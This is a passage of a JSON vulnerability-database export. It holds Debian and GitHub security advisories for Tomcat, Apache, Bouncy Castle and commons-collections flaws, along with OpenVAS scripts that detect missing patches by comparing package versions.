This JSP could then be requested and any code it contained would be executed by the server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.9}, "published": "2022-05-14T01:07:15", "type": "github", "title": "Unrestricted Upload of File with Dangerous Type Apache Tomcat", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12617"], "modified": "2023-12-08T23:04:11", "id": "GHSA-XJGH-84HX-56C5", "href": "https://github.com/advisories/GHSA-xjgh-84hx-56c5", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2023-12-06T19:15:55", "description": "Package : bouncycastle\nVersion : 1.44+dfsg-2+deb6u1\nCVE ID : CVE-2015-7940\nDebian Bug : 802671\n\nThe Bouncy Castle Java library before 1.51 does not validate that a point\nis within the elliptic curve, which makes it easier for remote attackers\nto obtain private keys via a series of crafted elliptic curve Diffie\nHellman (ECDH) key exchanges, aka an \"invalid curve attack.\"\n\nFor Debian 6 \u201cSqueeze\u201d, this issue has been fixed in 
version\n1.44+dfsg-2+deb6u1 of bouncycastle.\n\nMany thanks to upstream author Peter Dettmann who reviewed the backport\nthat we prepared.\n\n-- \nRapha\u00ebl Hertzog \u25c8 Debian Developer\n\nSupport Debian LTS: http://www.freexian.com/services/debian-lts.html\nLearn to master Debian: http://debian-handbook.info/get/\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {}, "published": "2015-12-08T11:28:10", "type": "debian", "title": "[SECURITY] [DLA 361-1] bouncycastle security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7940"], "modified": "2015-12-08T11:28:10", "id": "DEBIAN:DLA-361-1:E2323", "href": "https://lists.debian.org/debian-lts-announce/2015/12/msg00001.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-07T11:48:06", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3417-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nDecember 14, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bouncycastle\nCVE ID : CVE-2015-7940\nDebian Bug : 802671\n\nTibor Jager, J\u00f6rg Schwenk, and Juraj Somorovsky, from Horst G\u00f6rtz\nInstitute for IT Security, published a paper in ESORICS 2015 where they\ndescribe an invalid curve attack in Bouncy Castle Crypto, a Java library\nfor cryptography. 
An attacker is able to recover private Elliptic Curve\nkeys from different applications, for example, TLS servers.\n\nMore information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html\nPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.44+dfsg-3.1+deb7u1.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.49+dfsg-3+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.51-2.\n\nWe recommend that you upgrade your bouncycastle packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-12-14T12:51:06", "type": "debian", "title": "[SECURITY] [DSA 3417-1] bouncycastle security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7940"], "modified": "2015-12-14T12:51:06", "id": "DEBIAN:DSA-3417-1:D5725", "href": "https://lists.debian.org/debian-security-announce/2015/msg00322.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-22T13:34:08", "description": "Package : apache2\nVersion : 2.2.22-13+deb7u12\nCVE ID : CVE-2017-9798\nDebian Bug : 876109\n\nHanno Boeck discovered that incorrect parsing of Limit directives 
of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n2.2.22-13+deb7u12.\n\nWe recommend that you upgrade your apache2 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2017-09-21T20:42:18", "type": "debian", "title": "[SECURITY] [DLA 1102-1] apache2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9798"], "modified": "2017-09-21T20:42:18", "id": "DEBIAN:DLA-1102-1:511F7", "href": "https://lists.debian.org/debian-lts-announce/2017/09/msg00019.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T18:53:22", "description": "Package : tomcat7\nVersion : 7.0.28-4+deb7u16\nCVE ID : CVE-2017-12617\n\n\nA remote code execution vulnerability has been discovered in tomcat7.\n\nWhen HTTP PUT was enabled (e.g., via setting the readonly initialization\nparameter of the Default servlet to false) 
it was possible to upload a JSP\nfile to the server via a specially crafted request. This JSP could then be\nrequested and any code it contained would be executed by the server.\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n7.0.28-4+deb7u16.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T19:01:17", "type": "debian", "title": "[SECURITY] [DLA 1166-1] tomcat7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12617"], "modified": "2017-11-07T19:01:17", "id": "DEBIAN:DLA-1166-1:E77EB", "href": "https://lists.debian.org/debian-lts-announce/2017/11/msg00009.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T22:40:33", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory 
DSA-3417-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nDecember 14, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bouncycastle\nCVE ID : CVE-2015-7940\nDebian Bug : 802671\n\nTibor Jager, J\u00f6rg Schwenk, and Juraj Somorovsky, from Horst G\u00f6rtz\nInstitute for IT Security, published a paper in ESORICS 2015 where they\ndescribe an invalid curve attack in Bouncy Castle Crypto, a Java library\nfor cryptography. An attacker is able to recover private Elliptic Curve\nkeys from different applications, for example, TLS servers.\n\nMore information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html\nPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.44+dfsg-3.1+deb7u1.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.49+dfsg-3+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.51-2.\n\nWe recommend that you upgrade your bouncycastle packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-12-14T12:51:06", "type": "debian", "title": "[SECURITY] [DSA 3417-1] bouncycastle security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7940"], "modified": "2015-12-14T12:51:06", "id": "DEBIAN:DSA-3417-1:682B4", "href": "https://lists.debian.org/debian-security-announce/2015/msg00322.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:33:49", "description": "The host is running Oracle WebCenter Content\n and is prone to an unspecified vulnerability.", "cvss3": {}, "published": "2018-03-06T00:00:00", "type": "openvas", "title": "Oracle WebCenter Content Unspecified Vulnerability-01 (cpujan2018-3236628)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-2564"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310812959", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812959", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebCenter Content Unspecified Vulnerability-01 (cpujan2018-3236628)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:webcenter_content\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812959\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-2564\");\n script_bugtraq_id(102541);\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-06 11:17:44 +0530 (Tue, 06 Mar 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\"); ##Patch is available as solution\n script_name(\"Oracle WebCenter Content Unspecified Vulnerability-01 (cpujan2018-3236628)\");\n\n script_tag(name:\"summary\", value:\"The host is running Oracle WebCenter Content\n and is prone to an unspecified vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaws exist due to error in the 'Content\n Server' component.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n can result in unauthorized creation, deletion or modification access to critical\n data or all Oracle WebCenter Content accessible data as well as unauthorized read\n access to a subset of Oracle WebCenter Content accessible data.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebCenter Content version 11.1.1.9.0\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_oracle_webcenter_content_detect.nasl\");\n script_mandatory_keys(\"Oracle/WebCenter/Content/Version\");\n script_require_ports(\"Services/www\", 80, 443);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!webPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:webPort, exit_no_version:TRUE)) exit(0);\nwebVer = infos['version'];\npath = infos['location'];\n\nif(webVer == \"11.1.1.9.0\")\n{\n report = report_fixed_ver(installed_version:webVer, fixed_version: \"Apply the patch\", install_path:path);\n security_message(port:webPort, data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:07", "description": "Mageia Linux Local Security Checks mgasa-2016-0012", "cvss3": {}, "published": "2016-01-14T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0012", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-03-14T00:00:00", "id": "OPENVAS:1361412562310131177", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131177", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0012.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# 
(or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131177\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-01-14 07:28:50 +0200 (Thu, 14 Jan 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0012\");\n script_tag(name:\"insight\", value:\"It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library (CVE-2015-7501). With this update, deserialization of certain classes in the commons-collections library is no longer allowed. 
Applications that require those classes to be deserialized can use the system property org.apache.commons.collections.enableUnsafeSerialization to re-enable their deserialization.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0012.html\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0012\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"apache-commons-collections\", rpm:\"apache-commons-collections~3.2.1~24.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:36", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "openvas", "title": "RedHat Update for apache-commons-collections RHSA-2015:2522-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310871511", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871511", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for apache-commons-collections RHSA-2015:2522-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871511\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-01 06:13:14 +0100 (Tue, 01 Dec 2015)\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for apache-commons-collections RHSA-2015:2522-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache-commons-collections'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", 
value:\"The Apache Commons Collections library\nprovides new interfaces, implementations, and utilities to extend the features\nof the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at the linked references.\n\nAll users of apache-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\");\n script_tag(name:\"affected\", value:\"apache-commons-collections on Red Hat Enterprise Linux Server (v. 
7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:2522-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-November/msg00071.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/solutions/2045023\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-collections\", rpm:\"apache-commons-collections~3.2.1~22.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:01", "description": "Oracle Linux Local Security Checks ELSA-2015-2521", "cvss3": {}, "published": "2015-12-02T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-2521", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122792", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-2521.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, 
http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122792\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-12-02 11:24:54 +0200 (Wed, 02 Dec 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-2521\");\n script_tag(name:\"insight\", value:\"ELSA-2015-2521 - jakarta-commons-collections security update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-2521\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-2521.html\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections\", rpm:\"jakarta-commons-collections~3.2.1~3.5.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-javadoc\", rpm:\"jakarta-commons-collections-javadoc~3.2.1~3.5.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-testframework\", rpm:\"jakarta-commons-collections-testframework~3.2.1~3.5.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-testframework-javadoc\", rpm:\"jakarta-commons-collections-testframework-javadoc~3.2.1~3.5.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = 
isrpmvuln(pkg:\"jakarta-commons-collections-tomcat5\", rpm:\"jakarta-commons-collections-tomcat5~3.2.1~3.5.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "openvas", "title": "RedHat Update for jakarta-commons-collections RHSA-2015:2521-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310871512", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871512", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for jakarta-commons-collections RHSA-2015:2521-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
